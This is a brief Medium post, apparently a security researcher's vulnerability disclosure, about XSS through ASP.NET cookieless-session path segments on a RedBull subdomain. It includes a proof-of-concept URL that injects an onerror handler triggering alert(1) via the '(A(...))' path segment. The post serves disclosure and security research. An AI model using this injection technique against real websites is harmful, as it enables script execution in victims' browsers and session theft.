.NET Framework Cookieless Feature XSS.

multiple XSS at RedBull

if your application relies on cookieless sessions or might receive requests from mobile browsers that require cookieless sessions, using a tilde (“~”) in a path can result in inadvertently creating a new session and potentially losing session data .

<script src="/(A(ABCD))/Script.js"></script>
<script src="/(A(ABCD))/Script.js"></script>
http://liveblogat.redbull.com/(A(%22onerror=%22alert%601%60%22))/AllEvents.aspx
POC OF XSS

--

--

--

Offensive Cyber Security Researcher At Resecurity

Love podcasts or audiobooks? Learn on the go with our new app.

Javascript 30: 808s + JS

Authentication Flow with Apollo and React

How to handle NetworkError when using Fetch

React, Threejs, and Mobx-state-tree

Hi written in green blocks on a black background

View Encapsulation in Angular

JavaScript — How to send mobile push notifications to yourself

Functional Components VS Class Components

Building 2 Mobile Apps: From 0 to Launch in 6 Days [Day 5]

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmed Elmalky

Ahmed Elmalky

Offensive Cyber Security Researcher At Resecurity

More from Medium

DigitalOcean Managed Database: Create MySQL User and connect to MySQL Database using PHP

Security Testing — Applications

GSoC 2015 — Moorsp plugin for Moodle — Wrap Up

RE: Log4Shell 0-day exploit